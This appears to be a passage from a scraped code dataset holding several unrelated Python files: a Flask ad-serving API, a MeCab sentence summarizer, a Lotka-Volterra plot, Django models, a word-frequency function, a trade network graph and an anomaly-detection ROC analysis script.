ProxyFix(app.wsgi_app, x_for=2)\n provider = GeolocationProvider()\n\n @app.route('/spocs', methods=['POST'])\n def get_spocs():\n required_params = set(['version', 'consumer_key', 'pocket_id'])\n optional_params = set(['site', 'placements'])\n req_params = __get_request_params()\n return call(req_params, required_params, optional_params=optional_params)\n\n @app.route('/user', methods=['DELETE'])\n def delete_user():\n pocket_id = request.json['pocket_id']\n adzerk_api = AdZerk(pocket_id=pocket_id)\n response = adzerk_api.delete_user()\n\n return jsonify({'status': int(response.status_code == 200)}), response.status_code\n\n @app.route('/pulse')\n def pulse():\n return jsonify({'pulse': 'ok'})\n\n @app.errorhandler(MissingParam)\n @app.errorhandler(InvalidParam)\n @app.errorhandler(InvalidContentType)\n def handle_invalid_usage(error):\n response = jsonify(error.to_dict())\n response.status_code = error.status_code\n return response\n\n def call(req_params, required_params, optional_params=None):\n # first validate required parameters\n params = {k: v for k, v in req_params.items() if k in required_params}\n __validate_required_params(required_params, params)\n\n # then identify unknown parameters\n all_params = set([k for k in req_params.keys()])\n unknown_params = all_params - (optional_params | required_params) # given params minus union of allowed\n if len(unknown_params) > 0:\n raise InvalidParam('Unrecognized parameters: {0}'.format(unknown_params))\n\n # finally add optional parameters to required parameters\n other_params = {k: v for k, v in req_params.items() if k in optional_params}\n\n # do some additional checking for placements\n if 'placements' in other_params:\n __validate_placements(other_params['placements'])\n params.update(other_params)\n\n client = Client(ip=request.remote_addr, geolocation_provider=provider, **params)\n\n return jsonify(client.get_spocs())\n\n def __validate_required_params(required, params):\n missing = required - params.keys()\n if missing:\n raise MissingParam('Missing required argument(s): {0}'.format(', '.join(missing)))\n\n if not is_valid_pocket_id(params['pocket_id']):\n raise InvalidParam('Invalid pocket_id')\n\n def __validate_placements(placements):\n if not placements or len(placements) == 0:\n return\n required_params = ['name']\n optional_params = ['zone_ids', 'ad_types', 'count']\n list_params = ['ad_types', 'zone_ids']\n for p in placements:\n __validate_single_placement(p, required_params, optional_params, list_params)\n\n def __validate_single_placement(placement, required, optional, list_params):\n for r in required:\n if r not in placement:\n raise MissingParam('Missing required parameter {0} in placement field'.format(r))\n for f in placement.keys():\n if f not in required and f not in optional:\n raise InvalidParam('{0} is an unknown placement parameter'.format(f))\n for l in list_params:\n if l in placement and type(placement[l]) is not list:\n raise InvalidParam('{0} must be a list of values in placement field'.format(l))\n\n def __get_request_params():\n \"\"\"\n Copies request params into a mutable dictionary\n so that we can put in a default value for site if not present.\n Default value is None so that we can grab it from\n hardcoded conf.\n :return:\n \"\"\"\n if request.json is None:\n raise InvalidContentType('Expecting application/json body')\n\n req_params = dict()\n for k, v in request.json.items():\n req_params.update({k: v})\n for k, v in request.args.items():\n if k == 'site':\n req_params.update({'site': v})\n if 'site' not in req_params:\n req_params.update({'site': None})\n if 'placements' not in req_params:\n req_params.update({'placements': None})\n\n return req_params\n\n return app\n\n\nif __name__ == \"__main__\":\n app = create_app()\n app.run(port=8000)\n","sub_path":"app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"318505327","text":"# coding:utf-8\nimport MeCab\n\nparse = MeCab.Tagger(\"-d /usr/local/lib/mecab/dic/mecab-ipadic-neologd/\")\n\ndef input_document():\n sentence_list = []\n sentence_index = {}\n index = 0\n with open(\"sample2.txt\") as f:\n for line in f:\n parse = line.split(\"。\")\n for sentence in parse:\n if sentence != \"\\n\":\n sentence_list.append(sentence)\n sentence_index[sentence] = index\n index += 1\n # print(sentence_list)\n return sentence_list, sentence_index\n\ndef word_counting(sentence_list):\n\n word_count = {}\n total = 0\n\n for sentence in sentence_list:\n result = parse.parseToNode(sentence)\n while result:\n feat = result.feature.split(\",\")\n if feat[0] != \"記号\" and feat[0] != \"BOS/EOS\":\n # if feat[0] == \"名詞\" or feat[0] == \"形容詞\" or feat[0] == \"動詞\":\n # print(result.feature)\n # print(result.feature.split(\",\")[6])\n total += 1\n if feat[6] not in word_count:\n word_count[feat[6]] = 0\n word_count[feat[6]] += 1\n result = result.next\n # print(word_count)\n return word_count\n\ndef scoring(sentence_list, word_count, sentence_index):\n sentence_score = {}\n index = 0\n for sentence in sentence_list:\n sentence_word = {}\n result = parse.parseToNode(sentence)\n while result:\n feat = result.feature.split(\",\")\n if feat[0] != \"記号\" and feat[0] != \"BOS/EOS\":\n # if feat[0] == \"名詞\" or feat[0] == \"形容詞\" or feat[0] == \"動詞\":\n if feat[6] not in sentence_word:\n sentence_word[feat[6]] = 0\n sentence_word[feat[6]] += 1\n result = result.next\n sentence_score[sentence] = tf_idf(word_count, sentence_word, len(sentence_list))\n if index == 0:\n sentence_score[sentence] += 5.\n index += 1\n lim = 0\n sentence_oder = {}\n for sentence, score in sorted(sentence_score.items(), key=lambda x: x[1], reverse=True):\n # print(sentence)\n # print(score)\n sentence_oder[sentence] = sentence_index[sentence]\n lim += 1\n if lim == 5:\n break\n for sentence, oder in sorted(sentence_oder.items(), key=lambda x: x[1]):\n print(sentence)\n\ndef tf_idf(word_count, sentence_word, sentence_total):\n import math\n score = 0.\n for word, freq in sentence_word.items():\n # tf = freq / len(sentence_word)\n tf = freq * 0.1\n idf = math.log(sentence_total/word_count[word]) + 1.\n score += tf / idf\n return score\n\n\nif __name__==\"__main__\":\n\n sentence_list, sentence_index = input_document()\n print(sentence_list[0])\n sentence_list = sentence_list[1:]\n word_count = word_counting(sentence_list)\n scoring(sentence_list, word_count, sentence_index)\n","sub_path":"text-wrapping/auto_wrapping.py","file_name":"auto_wrapping.py","file_ext":"py","file_size_in_byte":2967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"617362624","text":"#!/usr/bin/env python3\n# Date: 3rd December 2019\n\n\"\"\"Script ploting output of discrete-time version of Lokta-Volterra model\"\"\"\n\n__appname__ = 'LV3.py'\n__author__ = 'Amy Solman (amy.solman19@imperial.ac.uk)'\n__version__ = '0.0.1'\n\nimport scipy as sc\n\nimport matplotlib.pylab as p\n\nimport numpy as np \n\n\nr = 1 #growth rate of resource pop\na = 0.1 #search rate for resource\nz = 1.5 #mortality rate\ne = 0.75 #consumers efficiency converting resource to consumer biomass\nR0 = 10 #starting resource pop\nC0 = 5 #starting consumer pop\nK = 30\n\n#Define time vector from point 0 to 30 using 10 subdivisions\ntimeseries = list(sc.linspace(0, 15, 1000))\nrows = len(timeseries)\n\nRC = np.zeros([rows,2]) #create numpy array of zeros \nRC[:1] = sc.array([R0, C0]) #fill the first row of the array with the starting pops\n\n#Discrete-time version of the LV model\n\nfor t in range(0, len(timeseries) - 1):\n RC[t+1][0] = RC[t][0] * (1 + (r * (1 - RC[t][0] / K)) - a * RC[t][1]) #fill first column of the next row with the new R pop\n RC[t+1][1] = RC[t][1] * (1 - z + e * a * RC[t][0]) #fill first column of the next row with the new C pop\n\nf1 = p.figure()\np.plot(timeseries, RC[:,0], 'g-', label='Resource density') #Plot\np.plot(timeseries, RC[:,1], 'b-', label = 'Consumer density')\np.grid()\np.legend(loc='best')\np.xlabel('Time')\np.ylabel('Population density')\np.title('Consumer-Resource population dynamics \\n r = 1, a = 0.1, z = 1.5, e = 0.75')\n\n#Finally, save the figure as a pdf:\n\nf1.savefig('../results/LV3_model1.pdf') #save figure\n\nf2 = p.figure()\np.plot(RC[:,0], RC[:,1], 'r-')\np.grid()\np.xlabel('Resource density')\np.ylabel('Consumer density')\np.title('Consumer-Resource population dynamics \\n r = 1, a = 0.1, z = 1.5, e = 0.75')\n\nf2.savefig('../results/LV3_model2.pdf')\n\n","sub_path":"Week7/Code/LV3.py","file_name":"LV3.py","file_ext":"py","file_size_in_byte":1763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"633562335","text":"from django.db import models\nfrom django.dispatch import Signal\nfrom django.contrib.auth.models import AbstractUser\nfrom django_extensions.db.fields import AutoSlugField\nfrom .validators import phone_number_validator\nfrom .validators import date_of_birth_validator\nfrom .validators import username_validator\nfrom .utilities import get_timestamp_path\nfrom .utilities import send_activation_notification\nfrom .utilities import slugify_function\nimport re\n\nuser_registrated = Signal(providing_args=['instance'])\n\n\ndef user_registrated_dispatcher(sender, **kwargs):\n send_activation_notification(kwargs['instance'])\n\n\nuser_registrated.connect(user_registrated_dispatcher)\n\n\nclass AdvancedUser(AbstractUser):\n slug = AutoSlugField(populate_from='username')\n user_image = models.ImageField(\n blank=True,\n upload_to=get_timestamp_path,\n verbose_name='Фотография пользователя')\n username = models.CharField(\n max_length=24,\n unique=True,\n help_text=('Вимоги: від шести до двадцяти чотирьох символів (6-24). '\n 'Букви латинського алфавіту, цифри та символ _'),\n validators=[username_validator],\n error_messages={\n 'unique': \"Користувач з таким іменем уже був зареєстрований раніше.\",\n },\n verbose_name='Нікнейм'\n )\n email = models.EmailField(\n unique=True,\n verbose_name='Email адреса'\n )\n phone_number = models.CharField(\n max_length=16,\n unique=True,\n null=True,\n blank=True,\n validators=[phone_number_validator],\n verbose_name='Номер телефона'\n )\n village = models.ForeignKey(\n to='VillagesOfBershad',\n null=True,\n blank=True,\n on_delete=models.PROTECT,\n verbose_name='Місто/село'\n )\n date_of_birth = models.CharField(\n max_length=32,\n null=True,\n blank=True,\n validators=[date_of_birth_validator],\n verbose_name='Дата народження',\n )\n is_activated = models.BooleanField(\n default=False,\n verbose_name='Профіль активований через ел.пошту',\n help_text='Параметр стає активним, коли користувач підтвердить свою електронну адресу.'\n )\n about_me = models.TextField(\n null=True,\n max_length=512,\n verbose_name='Про себе',\n help_text='Інформація про вас. Інші користувачі зможуть дізнатись про вас більше.'\n )\n\n\nclass ChangesInUserInformation(models.Model):\n \"\"\"\n Temporarily saving new user data, before changing basic information.\n The entry will be deleted after the user confirms the action via email.\n \"\"\"\n user = models.OneToOneField(AdvancedUser, on_delete=models.CASCADE)\n new_first_name = models.CharField(max_length=150, blank=True, null=True, verbose_name=\"Нове ім'я\")\n new_last_name = models.CharField(max_length=150, blank=True, null=True, verbose_name=\"Нова фамілія\")\n new_email = models.EmailField(verbose_name='Нова ел.пошта')\n new_phone_number = models.CharField(\n max_length=16,\n null=True,\n validators=[phone_number_validator],\n verbose_name='Номер телефона',\n )\n\n\nclass VillagesOfBershad(models.Model):\n name = models.CharField(\n max_length=64,\n )\n\n def __str__(self):\n return self.name\n\n class Meta:\n verbose_name = 'Населений пункт'\n verbose_name_plural = 'Населені пункти'\n\n\nclass Article(models.Model):\n slug = AutoSlugField(\n populate_from='title',\n db_index=True,\n slugify_function=slugify_function\n )\n author = models.ForeignKey(\n AdvancedUser,\n on_delete=models.CASCADE,\n verbose_name='Автор'\n )\n title = models.CharField(\n max_length=128,\n unique=True,\n verbose_name='Заголовок'\n )\n content = models.TextField(\n max_length=2500,\n verbose_name='Стаття'\n )\n published = models.DateTimeField(\n auto_now_add=True,\n db_index=True,\n verbose_name='Дата публікації'\n )\n category = models.ForeignKey(\n to='Category',\n default=None,\n on_delete=models.PROTECT,\n db_index=True,\n verbose_name='Категорія'\n )\n\n class Meta:\n ordering = ['-published']\n verbose_name = 'Стаття'\n verbose_name_plural = 'Статті'\n\n def __str__(self):\n return self.title\n\n\nclass Category(models.Model):\n parent = models.ForeignKey(\n 'self',\n null=True,\n blank=True,\n related_name='child_category',\n on_delete=models.PROTECT\n )\n title = models.CharField(max_length=50, verbose_name='Назва')\n slug = AutoSlugField(populate_from='title', slugify_function=slugify_function)\n\n def __str__(self):\n name = f'{self.parent}/{self.title}'\n return re.sub('None/', '', name)\n\n class Meta:\n verbose_name = 'Категорія'\n verbose_name_plural = 'Категорії'\n ordering = ['title']\n\n\n\n\n","sub_path":"main/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":5463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"144855279","text":"import re\nfrom collections import defaultdict\n\nimport advertools as adv\nimport pandas as pd\n\nfrom advertools.word_tokenize import word_tokenize\n\n\ndef word_frequency(text_list, num_list=None, phrase_len=1, regex=None,\n rm_words=adv.stopwords['english'], extra_info=False):\n \"\"\"Count the absolute as well as the weighted frequency of words\n in ``text_list`` (based on ``num_list``).\n\n :param text_list: iterable of strings.\n Typically short phrases, but could be any list of full blown documents.\n Usually, you would use this to analyze tweets, book titles, URLs, etc.\n :param num_list: iterable of numbers.\n A list of numbers with the same length as ``text_list``, describing a\n certain attribute of these 'documents'; views, retweets, sales, etc.\n :param regex: string.\n The regex used to split words. Doesn't need changing in most cases.\n :param phrase_len: integer, the length in words of each token the\n text is split into, defaults to 1.\n :param rm_words: iterable of strings.\n Words to remove from the list 'stop-words'. The default uses\n ``spacy``'s list of English stopwords. To get all available languages\n run ``adv.stopwords.keys()``\n :param extra_info: boolean.\n Whether or not to give additional columns about the frequencies\n :returns abs_wtd_df: absolute and weighted DataFrame.\n pandas.DataFrame with several metrics calculated. The most important\n are ``abs_freq`` and ``wtd_freq``. These show the difference between\n the number of occurrences of each word together with their respective\n weighted occurrences (frequency vs. weighted frequency). Other metrics\n are also provided. The columns are as follows:\n\n word: Word.\n Words in the document list each on its own row. The length of\n these words is determined by ``token_word_len``, essentially\n phrases if containing more than one word each.\n abs_freq: Absolute frequency.\n The number of occurrences of each word in all the documents.\n wtd_freq: Weighted frequency.\n Every occurrence of ``word`` multiplied by its respective value in\n ``num_list`` provided by the function call.\n rel_value: Relative value.\n ``wtd_freq`` divided by ``abs_freq``, showing the value per\n occurrence of ``word``\n\n :extra_info:\n\n abs_perc: Absolute frequency percentage.\n ``abs_freq`` divided by the sum of all occurrences of words.\n abs_perc_cum: Cumulative absolute percentage.\n Cumulative sum of ``abs_perc`` to see how many words form x% of\n the occurrences.\n wtd_freq_perc: ``wtd_freq`` divided by the total weighted frequencies\n of all words.\n wtd_freq_perc_cum: Cumulative weighted frequncy percentage.\n Cumulative sum of ``wtd_freq_perc`` to see how many words form x%\n of the weighted occurrences.\n\n >>> text_list = ['apple orange', 'apple orange banana',\n ... 'apple kiwi', 'kiwi mango']\n >>> num_list = [100, 100, 100, 400]\n\n >>> adv.word_frequency(text_list, num_list)\n word abs_freq wtd_freq rel_value\n 0 kiwi 2 500 250.0\n 1 mango 1 400 400.0\n 2 apple 3 300 100.0\n 3 orange 2 200 100.0\n 4 banana 1 100 100.0\n\n \"kiwi\" occurred twice (abs_freq), one of these phrases has a score of 100,\n and the other 400, so the wtd_freq is the sum (100 + 400 = 500)\n\n >>> adv.word_frequency(text_list) # num_list values default to 1 each\n word abs_freq wtd_freq rel_value\n 0 apple 3 3 1.0\n 1 orange 2 2 1.0\n 2 kiwi 2 2 1.0\n 3 banana 1 1 1.0\n 4 mango 1 1 1.0\n\n >>> text_list2 = ['my favorite color is blue',\n ... 'my favorite color is green', 'the best color is green',\n ... 'i love the color black']\n\n Setting ``token_word_len`` to 2, \"words\" become two-word phrases instead:\n\n >>> word_frequency(text_list2, token_word_len=2, rm_words=[])\n word abs_freq wtd_freq rel_value\n 0 color is 3 3 1.0\n 1 my favorite 2 2 1.0\n 2 favorite color 2 2 1.0\n 3 is green 2 2 1.0\n 4 is blue 1 1 1.0\n 5 the best 1 1 1.0\n 6 best color 1 1 1.0\n 7 i love 1 1 1.0\n 8 love the 1 1 1.0\n 9 the color 1 1 1.0\n 10 color black 1 1 1.0\n\n >>> adv.word_frequency(text_list, num_list, extra_info=True)\n word abs_freq abs_perc abs_perc_cum wtd_freq wtd_freq_perc wtd_freq_perc_cum rel_value\n 0 kiwi 2 0.222222 0.222222 500 0.333333 0.333333 250.0\n 1 mango 1 0.111111 0.333333 400 0.266667 0.600000 400.0\n 2 apple 3 0.333333 0.666667 300 0.200000 0.800000 100.0\n 3 orange 2 0.222222 0.888889 200 0.133333 0.933333 100.0\n 4 banana 1 0.111111 1.000000 100 0.066667 1.000000 100.0\n\n This is the same result as above but giving the full DataFrame including\n all columns.\n \"\"\"\n if num_list is None:\n num_list = [1 for i in range(len(text_list))]\n if isinstance(regex, str):\n regex = re.compile(regex)\n text_list = [' '.join(regex.findall(text)) for text in text_list]\n\n word_freq = defaultdict(lambda: [0, 0])\n\n for text, num in zip(word_tokenize(text_list, phrase_len=phrase_len),\n num_list):\n for word in text:\n if word.lower() in rm_words:\n continue\n word_freq[word.lower()][0] += 1\n word_freq[word.lower()][1] += num\n\n columns = ['abs_freq', 'wtd_freq']\n\n abs_wtd_df = (pd.DataFrame.from_dict(word_freq, orient='index',\n columns=columns)\n .sort_values('wtd_freq', ascending=False)\n .assign(rel_value=lambda df: df['wtd_freq'] / df['abs_freq'])\n .round())\n if extra_info:\n abs_wtd_df.insert(1, 'abs_perc', value=abs_wtd_df['abs_freq'] /\n abs_wtd_df['abs_freq'].sum())\n abs_wtd_df.insert(2, 'abs_perc_cum', abs_wtd_df['abs_perc'].cumsum())\n abs_wtd_df.insert(4, 'wtd_freq_perc', abs_wtd_df['wtd_freq'] /\n abs_wtd_df['wtd_freq'].sum())\n abs_wtd_df.insert(5, 'wtd_freq_perc_cum',\n abs_wtd_df['wtd_freq_perc'].cumsum())\n\n abs_wtd_df = abs_wtd_df.reset_index().rename(columns={'index': 'word'})\n\n return abs_wtd_df\n","sub_path":"advertools/word_frequency.py","file_name":"word_frequency.py","file_ext":"py","file_size_in_byte":7174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"609799341","text":"import os\r\nimport csv\r\nimport numpy as np\r\n\r\nimport matplotlib.pyplot as plt\r\nimport networkx as nx\r\n\r\n\r\ndef visualize_graph(G, with_world_map = True):\r\n \r\n if with_world_map:\r\n \r\n m = bm.Basemap(width=5.e6, height=3.e6, projection='cyl', lat_0=0, lon_0=0)\r\n \r\n m.drawcoastlines(linewidth=0.5)\r\n m.drawmapboundary(fill_color='whitesmoke', linewidth=0.5)\r\n m.fillcontinents(color='white', lake_color='whitesmoke')\r\n m.drawcountries(linewidth=0.5)\r\n m.drawstates(linewidth=0.5)\r\n \r\n lats = [coord[0] for coord in coords]\r\n lons = [coord[1] for coord in coords]\r\n \r\n py, px = m(lats, lons)\r\n pos = zip(px, py)\r\n layout = dict(zip(G, pos))\r\n \r\n regulating_constant = 1e3\r\n node_sizes = [(cases/population)*regulating_constant for (cases, population) in zip(covid_cases, populations)]\r\n nx.draw_networkx(G, pos=layout, width=1.0, node_size=node_sizes, node_color=colors, edge_color='red', with_labels=False)\r\n \r\n else:\r\n regulating_constant = 3e4\r\n node_sizes = [(cases/population)*regulating_constant for (cases, population) in zip(covid_cases, populations)]\r\n nx.draw_networkx(G,width=1.0, node_size=node_sizes)\r\n \r\n plt.show()\r\n\r\n\r\n\r\n\r\n\r\n# this line solves bug related to PROJ_LIB\r\n#os.environ['PROJ_LIB'] = \"C:\\\\ProgramData\\\\Anaconda3\\\\Library\\\\share\"\r\n\r\n# Federico: Custom change. Using an Ubuntu pc.\r\nos.environ['PROJ_LIB'] = \"/home/fico/anaconda3/share/proj/\"\r\n\r\nimport mpl_toolkits.basemap as bm\r\n\r\n# get list of files with trade info from country_files_detailed_summary folder\r\ncountry_files = os.listdir(os.getcwd()+'/'+'country_files_detailed_summary')\r\ncountry_files = ['country_files_detailed_summary/' + file_name for file_name in country_files]\r\n\r\n# create graph\r\nG = nx.DiGraph()\r\n\r\n# create countries lists\r\nrelevant_countries = ['Argentina', 'Belgium', 'Brazil', 'Chile', 'Colombia', 'Czech Republic', 'France', 'Netherlands', 'Peru', 'Spain', 'United Kingdom', 'United States']\r\nrelevant_countries = ['ARG', 'BEL', 'BRA', 'CHI', 'COL', 'CZR', 'FRA', 'NET', 'PER', 'SPA', 'UK', 'US']\r\n\r\n# countries values follow the same order as relevant_countries list\r\ncovid_cases = [1.24e6, 494e3, 5.65e6, 522e3, 1.14e6, 411e3, 1.79e6, 410e3, 918e3, 1.33e6, 1.19e6, 10e6]\r\n#populations = {'Argentina':44.49e6, 'Belgium':11.46e6, 'Brazil':209.5e6, 'Chile':18.73e6, 'Colombia':49.65e6, 'Czech Republic':10.65e6, 'France':66.99e6, 'Netherlands':17.28e6, 'Peru':31.99e6, 'Spain':46.94e6, 'United Kingdom':66.65e6, 'United States':328.2e6}\r\npopulations = [44.49e6, 11.46e6, 209.5e6, 18.73e6, 49.65e6, 10.65e6, 66.99e6, 17.28e6, 31.99e6, 46.94e6, 66.65e6, 328.2e6]\r\n\r\ncoords = [[-38.4161, -63.6167], [50.50389, 4.469936], [-14.235, -51.9253], [-35.6751, -71.543], [4.570868, -74.2973], [49.817492, 15.472962], [46.227638, 2.213749], [52.132633, 5.291266], [-9.189967, -75.015152], [40.463667, -3.74922], [55.378051, -3.435973], [37.09024, -95.712891]]\r\ncolors = ['blue', 'cyan', 'blue', 'blue', 'blue', 'blue', 'black', 'yellow', 'blue', 'green', 'blue', 'blue']\r\n\r\n# add nodes\r\nG.add_nodes_from(relevant_countries)\r\n\r\n\r\nfor i in range(len(country_files)): # for each file \r\n with open(country_files[i], encoding=\"utf-8\") as file: # open file\r\n \r\n reader = csv.reader(file, delimiter=',')\r\n headers = next(reader, None) # ignore headers\r\n \r\n \r\n for row in reader: # for each row\r\n \r\n # if countries in relation are in relevant_countries\r\n if row[0] in relevant_countries and row[1] in relevant_countries: \r\n \r\n if row[3] == 'Export': # if relation is export, add edge country_0 -> country_1\r\n G.add_edge(row[0], row[1])\r\n print(row[0], '-->' ,row[1]) \r\n \r\n elif row[3] == 'Import': # if relation is export, add edge country_1 -> country_0\r\n G.add_edge(row[1], row[0])\r\n print(row[1], '-->' ,row[0])\r\n\r\n\r\nvisualize_graph(G, False)\r\n","sub_path":"ECE595/project_4/proj3_dir.py","file_name":"proj3_dir.py","file_ext":"py","file_size_in_byte":4117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"41209302","text":"'''\r\nRun data analysis on exported contamination results\r\n'''\r\n## General imports\r\nimport numpy as np\r\nimport pandas as pd\r\nimport os,inspect\r\nimport math\r\n\r\n# Get this current script file's directory:\r\nloc = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))\r\n# Set working directory\r\nos.chdir(loc)\r\nfrom myFunctions import gen_FTN_data\r\nfrom meSAX import *\r\n\r\n# from dtw_featurespace import *\r\n# from dtw import dtw\r\n# from fastdtw import fastdtw\r\n\r\n# to avoid tk crash\r\nimport matplotlib\r\nmatplotlib.use('Qt5Agg')\r\nimport matplotlib.pyplot as plt\r\nfrom mpl_toolkits.mplot3d import Axes3D\r\n\r\n\r\n## Function\r\n\r\ndef parse_pivot_from_file(file,data_row,data_col, mode = 0):\r\n '''\r\n inputs:\r\n file: file location path\r\n data_row: data content starting row\r\n data_col: data content starting column\r\n mode: the format of pivot table in file,\r\n if column names are stacked at the end of index(row) names, use mode = 0(default)\r\n if column names are stacked at the start of index(row) names, use mode = 1\r\n For pandas saved pivot_table in csv files, use mode = 0\r\n outputs:\r\n df_load: recovered pivot table loaded from file\r\n '''\r\n import numpy as np\r\n import pandas as pd\r\n \r\n y_e = data_row - 1 # ending col name position\r\n x_e = data_col - 1 # ending row name position\r\n \r\n df = pd.read_csv(file,header = None) \r\n \r\n # reconstruct pivot table from csv file:\r\n arr = np.array(df)\r\n data_arr = arr[data_row:,data_col:] # data content values\r\n\r\n # multi index rows\r\n # locate row names\r\n for x_s in range(x_e,-1,-1):\r\n if str(arr[y_e,x_s]) == '' or str(arr[y_e,x_s]) == 'nan':\r\n x_s += x_s\r\n break\r\n row_names = arr[y_e,x_s:x_e+1]\r\n \r\n # generate levels\r\n multirow_shape = (arr.shape[0] - data_row,len(row_names))\r\n mirow_arr = np.empty(multirow_shape,dtype=np.object)\r\n \r\n for col,row_name in enumerate(row_names):\r\n row = [x for x in arr[data_row:,col] if not (str(x)=='' or str(x)=='nan')]\r\n n = int(multirow_shape[0]/len(row))\r\n \r\n for i in range(len(row)):\r\n s = i*n\r\n e = s + n\r\n mirow_arr[s:e,col] = np.array([row[i] for x in range(n)])\r\n \r\n miindex = pd.MultiIndex.from_arrays(mirow_arr.T ,names=row_names) \r\n\r\n\r\n # multi index columns\r\n # locate col names\r\n x_loc = x_s if mode==0 else x_e # mode\r\n for y_s in range(y_e,-1,-1):\r\n if str(arr[y_s,x_loc]) == '' or str(arr[y_s,x_loc]) == 'nan':\r\n y_s += y_s\r\n break\r\n col_names = arr[y_s:y_e,x_loc]\r\n \r\n # generate levels\r\n multicol_shape = (len(col_names),arr.shape[1] - data_col)\r\n micol_arr = np.empty(multicol_shape,dtype=np.object)\r\n \r\n for row,col_name in enumerate(col_names):\r\n col = [x for x in arr[row,data_col:] if not (str(x)=='' or str(x)=='nan')]\r\n n = int(multicol_shape[1]/len(col))\r\n \r\n for i in range(len(col)):\r\n s = i*n\r\n e = s + n\r\n micol_arr[row,s:e] = np.array([col[i] for x in range(n)])\r\n \r\n micolumns = pd.MultiIndex.from_arrays(micol_arr,names=col_names) \r\n \r\n # cols_names = list(arr[:data_row-1,data_col-1])\r\n # row_names = arr[data_row:,col_e]\r\n \r\n # recovered data frame\r\n df_load = pd.DataFrame(data_arr,index = miindex,columns=micolumns)\r\n # df_load = pd.DataFrame(data_arr,index = row_names,columns=micolumns)\r\n # df_load.index.name = arr[data_row-1,data_col-1]\r\n \r\n return(df_load)\r\n## Load data\r\n\r\nfile = r'L:\\HVAC_ModelicaModel_Data\\python_figs\\HVACv6a_3room_Boston+SmallOffice\\all_contamination_classified.csv'\r\ndata_row = 4\r\ndata_col = 2\r\n\r\ndf = parse_pivot_from_file(file,data_row,data_col, mode = 0)\r\n\r\n# rows\r\nalgorithms = df.index.levels[0] # 'IsolationForest', 'LOF'\r\ncontam_level = df.index.levels[1] # '0.001', ... etc\r\n\r\n# columns\r\nexperiments = df.columns.levels[0] # 130_HVACv4a_Boston+SmallOffice_Workday... etc\r\ndist_measures = df.columns.levels[1] # 'Euclidean', 'High-low'\r\nrates = df.columns.levels[2] # 'Fault detection rate', 'Normal operation rate'\r\n\r\n## TPR, FPRs\r\n# set anomaly algorithm, experiment(fault type), and distance measure\r\nnorm_exp_index = 0\r\nTPR = df.loc[algorithms[1]][experiments[norm_exp_index]][dist_measures[0]][rates[1]]\r\nFPR = df.loc[algorithms[1]][experiments[3]][dist_measures[0]][rates[1]]\r\ncontams = list(TPR.index)\r\n\r\nTPR = list(TPR)\r\nFPR = list(FPR)\r\n\r\nTPR.insert(0,0)\r\nTPR.append(100)\r\nFPR.insert(0,0)\r\nFPR.append(100)\r\ncontams.insert(0,0)\r\ncontams.append(100)\r\n\r\ncoords = np.array([FPR,TPR,contams],dtype=float).T\r\n# coords.sort(axis=0)\r\n\r\n# sort with numpy using structured array\r\ndtype = [('FPR',float),('TPR',float),('contamination',float)]\r\ncoords_struct = np.empty(len(TPR),dtype)\r\ncoords_struct['TPR'] = TPR\r\ncoords_struct['FPR'] = FPR\r\ncoords_struct['contamination'] = contams\r\ncoords_struct.sort(order='FPR')\r\n\r\n# sort with pandas\r\ncoords_df = pd.DataFrame(coords,columns = ['FPR','TPR','contaminations'])\r\ncoords_sorted = coords_df.sort_values(by=['FPR'])\r\n\r\n# plot\r\nplt.figure()\r\nplt.scatter(FPR,TPR)\r\n# plt.plot(coords[:,0],coords[:,1])\r\nplt.plot(coords_struct['FPR'],coords_struct['TPR'])\r\nplt.plot([0,100],[0,100],color = 'gray',linestyle=':')\r\n# add contamination label\r\npre_x, pre_y = np.nan,np.nan # x,y coordinates of previous step\r\nfor i in range(1,len(TPR)-1):\r\n # plt.text(coords[i,0],coords[i,1],coords_sorted['contaminations'][i])\r\n \r\n # plot label text only if coords changed to avoid text overlays\r\n if not (pre_x == coords_struct['FPR'][i] and pre_y == coords_struct['TPR'][i]):\r\n plt.text(coords_struct['FPR'][i],coords_struct['TPR'][i],coords_sorted['contaminations'][i])\r\n pre_x = coords_struct['FPR'][i]\r\n pre_y = coords_struct['TPR'][i]\r\n\r\nplt.xlabel('FPR(%)')\r\nplt.ylabel('TPR(%)')\r\nplt.xlim(-5,105)\r\nplt.ylim(-5,105)\r\nplt.show()\r\n\r\n##\r\n\r\n# exp_list = experiments[[3,4,5,6,8,9]]\r\nexp_list = experiments\r\n# rename the experiments for plots only\r\nexp_names = ['Normal',\r\n 'Fault 1',\r\n 'Fault 2',\r\n 'Fault 3',\r\n 'Fault 4',\r\n 'Fault 5',\r\n ]\r\n \r\n# plot subplots\r\nfor e,experiment in enumerate(exp_list):\r\n # plt.figure()\r\n fig,axes = plt.subplots(2,2,sharex='all', sharey='all')\r\n for d,d_measure in enumerate(dist_measures):\r\n for a,aa in enumerate(algorithms):\r\n TPR = df.loc[algorithms[a]][experiments[norm_exp_index]][dist_measures[d]][rates[1]]\r\n FPR = df.loc[algorithms[a]][experiment][dist_measures[d]][rates[1]]\r\n contams = list(TPR.index)\r\n \r\n TPR = list(TPR)\r\n FPR = list(FPR)\r\n # add starting and ending BCs\r\n TPR.insert(0,0)\r\n TPR.append(100)\r\n FPR.insert(0,0)\r\n FPR.append(100)\r\n contams.insert(0,0)\r\n contams.append(100)\r\n \r\n # coordinate array\r\n coords = np.array([FPR,TPR,contams],dtype=float).T\r\n \r\n # sort with numpy using structured array\r\n dtype = [('FPR',float),('TPR',float),('contamination',float)]\r\n coords_struct = np.empty(len(TPR),dtype)\r\n coords_struct['TPR'] = TPR\r\n coords_struct['FPR'] = FPR\r\n coords_struct['contamination'] = contams\r\n coords_struct.sort(order='FPR')\r\n \r\n # plot\r\n ax = axes[a,d]\r\n ax.scatter(coords_struct['FPR'],coords_struct['TPR'])\r\n ax.plot(coords_struct['FPR'],coords_struct['TPR'])\r\n # 